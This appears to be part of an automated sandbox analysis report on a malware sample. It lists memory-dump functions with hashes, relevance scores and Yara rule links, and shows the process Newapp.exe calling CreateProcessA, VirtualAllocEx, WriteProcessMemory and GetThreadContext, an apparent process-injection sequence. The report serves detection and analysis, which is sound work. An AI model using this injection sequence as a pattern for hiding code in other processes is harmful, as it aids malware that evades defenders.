API String ID: 2638914809-0
Opcode ID: 991373512e565d1074aa0510a051d2357ac837edbded8f9fbd11276bb99aebb3
Instruction ID: fbd2a8db3c606a34a77254a7780e76ee959ef3e4290bfa03fcd3f5e74c7af536
Opcode Fuzzy Hash: 991373512e565d1074aa0510a051d2357ac837edbded8f9fbd11276bb99aebb3
Instruction Fuzzy Hash: 88421574A01228CFCBA4EB34D9586ADB7B6BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410DFD, Relevance: 5.0, APIs: 3, Instructions: 546libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 8ba22b00a89c3e50f7da94612d8e8d56d39c2bc04ceb66283c7d6128db4f7c10
Instruction ID: f86d8f1c7c74ac996a1ea1a15123bfe6b1d3274ffbc79cfcb22962db7c22b8fc
Opcode Fuzzy Hash: 8ba22b00a89c3e50f7da94612d8e8d56d39c2bc04ceb66283c7d6128db4f7c10
Instruction Fuzzy Hash: 55422674A01228CBCBA4EF34D9586ADB7B6BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410E42, Relevance: 5.0, APIs: 3, Instructions: 539libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 5fbed38d5387436fbe74e109f145d52504812b26a07cd26f019ef7bf6c84a539
Instruction ID: d461e411f4a597c70f12f42519fe49d63e921ddd5d3a4b9af07b08e172eb1398
Opcode Fuzzy Hash: 5fbed38d5387436fbe74e109f145d52504812b26a07cd26f019ef7bf6c84a539
Instruction Fuzzy Hash: 80422674A01228CBCBA4EF34D9586ADB7B6BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410E87, Relevance: 5.0, APIs: 3, Instructions: 530libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: a92d85693e66378d4ccd6a23ee2a7272e858931841c98bdb4fb4e4f5e062b11a
Instruction ID: 3355464b10b95534da4a2acbbc8d1626a69835d4bad62a6fe0d9c5d4f0fd0a9c
Opcode Fuzzy Hash: a92d85693e66378d4ccd6a23ee2a7272e858931841c98bdb4fb4e4f5e062b11a
Instruction Fuzzy Hash: 79322674A012288FCBA4EF34C9586ADB7B2BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410EC3, Relevance: 5.0, APIs: 3, Instructions: 525libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 30a15df68c731e5c106cdf865272a0314355cc51ab26e7fe665718d43054ef76
Instruction ID: 85db76af6dd59655d7a7d7291c4cc519d466cb074bc2c356a502e6e054280865
Opcode Fuzzy Hash: 30a15df68c731e5c106cdf865272a0314355cc51ab26e7fe665718d43054ef76
Instruction Fuzzy Hash: DD322674A052288FCBA4EF34D9586ADB7B2BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410F08, Relevance: 5.0, APIs: 3, Instructions: 518libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 9ab9dfc6e2d16d2b6a6cca9eb29c87ea5e3f0f2609b501213082758b77cb7585
Instruction ID: b5b005b93bc97347485b9168997a3fee7d57120d57dd2a50188e4fcd35e7ce8f
Opcode Fuzzy Hash: 9ab9dfc6e2d16d2b6a6cca9eb29c87ea5e3f0f2609b501213082758b77cb7585
Instruction Fuzzy Hash: C3322674A012288FCBA4EF34D9586ADB7B2BF89205F5084EAD609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410F4D, Relevance: 5.0, APIs: 3, Instructions: 511libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 4cea8fbd46648f2f5a6491be5a9470b43fd4225c39d24fff129254d08cf58860
Instruction ID: e1629315f38001e9c03d3e21537bb1b61b32aec56f1e30ef26db4e58198b1dbb
Opcode Fuzzy Hash: 4cea8fbd46648f2f5a6491be5a9470b43fd4225c39d24fff129254d08cf58860
Instruction Fuzzy Hash: 5C323774A052288FCBA4EF34D9586ADB7B2BF89205F5084EAC609A3744CF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410F92, Relevance: 5.0, APIs: 3, Instructions: 504libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 4909c51285e50cc8f3ee1a1feff0aef740161627fece285869b7e6eb6c288aec
Instruction ID: d4b1a5f464b97f6131396f47919baafbc7906f70ab6dc260cd5cf09e61b8440d
Opcode Fuzzy Hash: 4909c51285e50cc8f3ee1a1feff0aef740161627fece285869b7e6eb6c288aec
Instruction Fuzzy Hash: 5D322674A052288FCBA4EF34D9586ADB7B2BF89205F5084EAC609A3744DF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01410FD7, Relevance: 5.0, APIs: 3, Instructions: 497libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 9ddc183774da1bcb397cddc9f7d3e78b090adebf2d1c5f6a83365320e788be8d
Instruction ID: f8b4f37707b0c7492ba52270880b1a83216464d8e2bddc51e0c556cb149d7364
Opcode Fuzzy Hash: 9ddc183774da1bcb397cddc9f7d3e78b090adebf2d1c5f6a83365320e788be8d
Instruction Fuzzy Hash: 67323674A052288FCBA4EF34D9587ADB7B2BF89205F5084EAC609A3744DF349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0141101C, Relevance: 5.0, APIs: 3, Instructions: 490libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 4a599f826148f9026193d4da4852951430122012763ce437714af8a236380b4c
Instruction ID: 1bedd5d02d6ddb4d15cfd3603f6e59b010dce353c2e4589a53c3487c696a0f91
Opcode Fuzzy Hash: 4a599f826148f9026193d4da4852951430122012763ce437714af8a236380b4c
Instruction Fuzzy Hash: EA223674A052288FCBA4EF34C9587ADB7B2AF89205F5084EAC609A3744DF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01411061, Relevance: 5.0, APIs: 3, Instructions: 483libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 216c66e0e69eabc5a0e0870d59f67cc12684f469084d946c04c97ee81c3b21a5
Instruction ID: 4de8f9f373339fed8548d3d75d14923b1670d34ddf34200a59b789cece796bb0
Opcode Fuzzy Hash: 216c66e0e69eabc5a0e0870d59f67cc12684f469084d946c04c97ee81c3b21a5
Instruction Fuzzy Hash: 90222674A052288FCBA4EF34C9587ADB7B2AF89205F5084EAD609A3744DF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014110A6, Relevance: 5.0, APIs: 3, Instructions: 476libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 2f37e93aa1b096d80d5bceacaf0ad047305dbd11f4dc026b29eb2bc4fb4532da
Instruction ID: 89375968893a96d4489b9e00ba2aaa214f78b9774f18c98ee80b00f6e18aec54
Opcode Fuzzy Hash: 2f37e93aa1b096d80d5bceacaf0ad047305dbd11f4dc026b29eb2bc4fb4532da
Instruction Fuzzy Hash: 84222674A052288FCBA4EF34C9587ADB7B2AF89205F5084EAD609A3744DF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014110EB, Relevance: 5.0, APIs: 3, Instructions: 469libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 4cdba918a654cf4acc91a95e95fcd2e085901217e45f7baa1a344e22637a7ad9
Instruction ID: 867099680789ec81a2534b2899fcb6ebba5f3c43a1452a7eac3d525521e415f5
Opcode Fuzzy Hash: 4cdba918a654cf4acc91a95e95fcd2e085901217e45f7baa1a344e22637a7ad9
Instruction Fuzzy Hash: 862236B4A052288FCBA4EF34C9587ADB7B2AF89205F5084E9D609A3744DF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01411130, Relevance: 5.0, APIs: 3, Instructions: 462libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: b7c386a95fc5f9da129961c42f94da4c957b54d525420c4c87d97f3dee72a312
Instruction ID: 6cfb81e5f402ac76b1753769e3bfbfc74ee2301ad8e7f61eb05fcbb7e39c5148
Opcode Fuzzy Hash: b7c386a95fc5f9da129961c42f94da4c957b54d525420c4c87d97f3dee72a312
Instruction Fuzzy Hash: 172236B4A052288FCBA4EF34C9587ADB7B2AF89205F5084E9D609A3744DF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01411175, Relevance: 5.0, APIs: 3, Instructions: 453libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 805ab4353f28cddbb22332d5a4bdd52998530843f09443dd1a7079ee4c45e871
Instruction ID: 53a80a4e202569b2e61cf6172aa4cf5cc735558998a198fd31522e4dd2fa6eef
Opcode Fuzzy Hash: 805ab4353f28cddbb22332d5a4bdd52998530843f09443dd1a7079ee4c45e871
Instruction Fuzzy Hash: CA1237B4A052288FCBA4EF34C9587ADB7B2AF89205F5084E9D609A3744DF349EC1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014111B1, Relevance: 4.9, APIs: 3, Instructions: 448libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: eb03bf5d88a04fded9b0163eb7e44dadbea579ef0e91bdd1701b41f1e36a49ec
Instruction ID: 693f54e2c5dd32e15f1b09752758d4a74eecc3db22fd96263bb33c0a4f265c67
Opcode Fuzzy Hash: eb03bf5d88a04fded9b0163eb7e44dadbea579ef0e91bdd1701b41f1e36a49ec
Instruction Fuzzy Hash: 741236B4A052288FCBA4EF34C9587ADB7B2BF88205F5084E9D609A3744DF349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014111F9, Relevance: 4.9, APIs: 3, Instructions: 439libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 05b48d8e27399fa881456c7cce20114ca41e8dcba7716d3c8261e7dd7a751742
Instruction ID: e52aabb27fb2dcef34c48b4726dcf820e39a19183b2c47bd5f53f9c60100ef32
Opcode Fuzzy Hash: 05b48d8e27399fa881456c7cce20114ca41e8dcba7716d3c8261e7dd7a751742
Instruction Fuzzy Hash: 881237B4A052288FCBA4EF34C9587ADB7B2AF88205F5084E9D609A3744DF349EC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01411235, Relevance: 4.9, APIs: 3, Instructions: 434libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: 43295e7c8619f3730a1a0e7af24160aa75729f8d7f68bea6781af663fd5db4e2
Instruction ID: 0e50743b9a9a46f4de96e07e3697c9157b9f3f986b88678806c58de9d520214e
Opcode Fuzzy Hash: 43295e7c8619f3730a1a0e7af24160aa75729f8d7f68bea6781af663fd5db4e2
Instruction Fuzzy Hash: FC1236B4A052288FCBA4EF34C9587ADB7B2AF88205F5084E9D609A3744DF349EC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0141127D, Relevance: 4.9, APIs: 3, Instructions: 427libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 014112A4
KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID:
API String ID: 2638914809-0
Opcode ID: e4aa43e4399fae66d270d8ab1671a1aa9240f565cba76240a0b2aabcba1ada88
Instruction ID: 282c923f3e2bb34e1f5ee28eadf3cf9a2b441461b41bd05d04ddf68c19db4311
Opcode Fuzzy Hash: e4aa43e4399fae66d270d8ab1671a1aa9240f565cba76240a0b2aabcba1ada88
Instruction Fuzzy Hash: 5D1237B4A052288FCBA4EF34C9587ADB7F2AF88205F5084E9D609A3744DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014112C5, Relevance: 3.4, APIs: 2, Instructions: 420libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 1f434f908d3408fd758c697f91279bdb21a7c221aebbc69ec7d8746e5ea2ba8e
Instruction ID: 828c294d92cbfd5ae0a7c2ab55b31adb95ce86eaaf1deceb874dc7de22c41262
Opcode Fuzzy Hash: 1f434f908d3408fd758c697f91279bdb21a7c221aebbc69ec7d8746e5ea2ba8e
Instruction Fuzzy Hash: 3F1227B4A052288FCBA4EF34C9587ADB7F2AF88205F5084E9D609A3744DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0141130D, Relevance: 3.4, APIs: 2, Instructions: 413libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 22be1998cc2ea836c580d90d0180bf264fabe8c86fce2e248073e50685dbe467
Instruction ID: 4c4a336c177575a5ee4a44a8f19c45bf61c2b649a00007b5e0de3088a2116c9b
Opcode Fuzzy Hash: 22be1998cc2ea836c580d90d0180bf264fabe8c86fce2e248073e50685dbe467
Instruction Fuzzy Hash: 570238B4A052288FCBA4EF34C9587ADB7F2AF88205F5084E9D609A3744DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01411355, Relevance: 3.4, APIs: 2, Instructions: 406libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0141137C
LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: acf6f5fdac16c18617f9b29726b6d9e959d15a2915b217cbdf9d6937a6f6c241
Instruction ID: e2ca50ba3f84dadee5c824d7fc7cacaec98b9bac85232baa7a176f3855deea78
Opcode Fuzzy Hash: acf6f5fdac16c18617f9b29726b6d9e959d15a2915b217cbdf9d6937a6f6c241
Instruction Fuzzy Hash: DE0247B4A052288FCBA4EF34C9587ADB7F2AF88205F5084E9D609A3344DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014113B3, Relevance: 1.9, APIs: 1, Instructions: 395libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e8ec03cf786f340cfd300a9d04b06b171023bb9866b5cf6530a4d02ab904ba76
Instruction ID: 5259ffc661fa73ffcd4b8983b2b22ac4f2194a89f9f541755697e7c96daea12f
Opcode Fuzzy Hash: e8ec03cf786f340cfd300a9d04b06b171023bb9866b5cf6530a4d02ab904ba76
Instruction Fuzzy Hash: 040238B4A052288FCBA4EF74C9587ADB7F2AF88205F5084E9D609A3344DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014113FB, Relevance: 1.9, APIs: 1, Instructions: 388libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0141154D

Memory Dump Source

Source File: 00000005.00000002.502724210.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5c9149ff983fa391e9cbdf49a10880bc18817ecdee9dc774534b7b710a1e44a2
Instruction ID: 9b4f7157178a19a75aa3704d8113b1dc887ea9d7dc11981e63d7d6375999a15a
Opcode Fuzzy Hash: 5c9149ff983fa391e9cbdf49a10880bc18817ecdee9dc774534b7b710a1e44a2
Instruction Fuzzy Hash: 520238B4A052288FCBA4EF74C9587ADB7F2AF88205F5084E9D609A3344DF349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0143E200, Relevance: 1.7, APIs: 1, Instructions: 209libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0143E291

Memory Dump Source

Source File: 00000005.00000002.502924509.0000000001430000.00000040.00000001.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dad14d384a3dab8ba59f4de905ea39af7135913aba96be07eab72b0691c626d
Instruction ID: 6a7f5de700ae76f406ad54aca3e3af27b7a655b76ec697a272a1255b649bc6b6
Opcode Fuzzy Hash: 8dad14d384a3dab8ba59f4de905ea39af7135913aba96be07eab72b0691c626d
Instruction Fuzzy Hash: 9E717E31A022099FDB14EFB5D558BAE7BB2AFD8304F148439D412EB3A1DB79D846CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01421308, Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.502846213.0000000001420000.00000040.00000001.sdmp, Offset: 01420000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 691db7cbe1ba84828ffc5effcd621bd44dfd8188b7d5054ba03e76115229ee46
Instruction ID: d8c01a1bb326892324658a5a1dc6ba8d6a0056be9550b726c6cacb985bb7ae2d
Opcode Fuzzy Hash: 691db7cbe1ba84828ffc5effcd621bd44dfd8188b7d5054ba03e76115229ee46
Instruction Fuzzy Hash: 74411271E143958FCB04CFB9C8006AEBBF1EF8A214F0986AFD504E7651DB349884CB91

Uniqueness

Uniqueness Score: -1.00%

Function 014213D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 01421447

Memory Dump Source

Source File: 00000005.00000002.502846213.0000000001420000.00000040.00000001.sdmp, Offset: 01420000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e59f393e77288328df27355647f67ddfb7b54b2a6a854927624c84d63be083e5
Instruction ID: 58ba6324707c3c52541ea6795d51cd31818bc3a80fc9156918381500cd54751c
Opcode Fuzzy Hash: e59f393e77288328df27355647f67ddfb7b54b2a6a854927624c84d63be083e5
Instruction Fuzzy Hash: 912136B1C006599FCB10CFAAD444BDEFBF4BF48324F15812AD418A7240D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Newapp.exe PID: 996 Parent PID: 3472 Newapp.exeCOMMON

Executed Functions

Function 0967E518, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0967E7DF

Memory Dump Source

Source File: 0000000E.00000002.352454779.0000000009670000.00000040.00000001.sdmp, Offset: 09670000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3ba32d746a5b15f42e9d42620c07ce98a36a6d89a1f5454857900f47b1d6af41
Instruction ID: ab7b6346710c7378a784dac1bd42c6d5e62fc88db7440313d0387ad37dc97d29
Opcode Fuzzy Hash: 3ba32d746a5b15f42e9d42620c07ce98a36a6d89a1f5454857900f47b1d6af41
Instruction Fuzzy Hash: FFC14671D0422D8FDB21CFA4C940BEDBBB1BF49304F0095A9E519B7250EB759A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0967E190, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0967E263

Memory Dump Source

Source File: 0000000E.00000002.352454779.0000000009670000.00000040.00000001.sdmp, Offset: 09670000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d35117ba32e466804812dddce9365eb021406280275dfeede721ed1de6b80aeb
Instruction ID: 6826ccaca705d3565a1f07ad00348fde9c3235dd345a566c1ba1f5493414c0dc
Opcode Fuzzy Hash: d35117ba32e466804812dddce9365eb021406280275dfeede721ed1de6b80aeb
Instruction Fuzzy Hash: 0C41C8B4D012589FCF00CFA9C984AEEFBF1BB09314F14942AE818B7210D735AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0967E2E8, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0967E39A

Memory Dump Source

Source File: 0000000E.00000002.352454779.0000000009670000.00000040.00000001.sdmp, Offset: 09670000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c805f069bc353d37b0eabff9250252b9399b7d4619aee1d6d7e02263bd6fdf3f
Instruction ID: e5dabfd9e55b54faf6e1f9f8276a9d51f4520d02b47e6a80f2253510699b5a54
Opcode Fuzzy Hash: c805f069bc353d37b0eabff9250252b9399b7d4619aee1d6d7e02263bd6fdf3f
Instruction Fuzzy Hash: F441A8B5D042589FCF00CFAAD984AEEFBB1BB19324F14942AE815B7310D739A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0967E070, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0967E11A

Memory Dump Source

Source File: 0000000E.00000002.352454779.0000000009670000.00000040.00000001.sdmp, Offset: 09670000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 056dc7cb5e9e7aeebd7adbad448cc0784984643cb80ca2710a69ae8e8faf112f
Instruction ID: 91dd507c5ecefb39fe320e9bf920007872f7e946e4c03bd7bc2423f4f5ca539a
Opcode Fuzzy Hash: 056dc7cb5e9e7aeebd7adbad448cc0784984643cb80ca2710a69ae8e8faf112f
Instruction Fuzzy Hash: 4931A8B4D042589FCF10CFA9D980ADEFBB1BB59310F14942AE814B7310D735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01577E20, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 01577ECF

Memory Dump Source

Source File: 0000000E.00000002.344100501.0000000001570000.00000040.00000001.sdmp, Offset: 01570000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f991dfde9c344041643dac44eaaec08973d73544449c0b6d412fb440c6c35854
Instruction ID: 8b28f8c0063f41e087be2110a213a711e237b60f770711f869c1e79e04328f64
Opcode Fuzzy Hash: f991dfde9c344041643dac44eaaec08973d73544449c0b6d412fb440c6c35854
Instruction Fuzzy Hash: BF31A6B9D042589FCF10CFA9E584AEEFBB0BB19310F24942AE814B7210C735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0967DF48, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 0967DFF7

Memory Dump Source

Source File: 0000000E.00000002.352454779.0000000009670000.00000040.00000001.sdmp, Offset: 09670000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: cf0c7b5cb95afc24cd66c64d24acbc3f3853ed99df95b431f4ad4093ccaed288
Instruction ID: 90990aa3cd612669fde35bdf4cf3ab3513824514bfb77a7ac7b1c218cd3e3c48
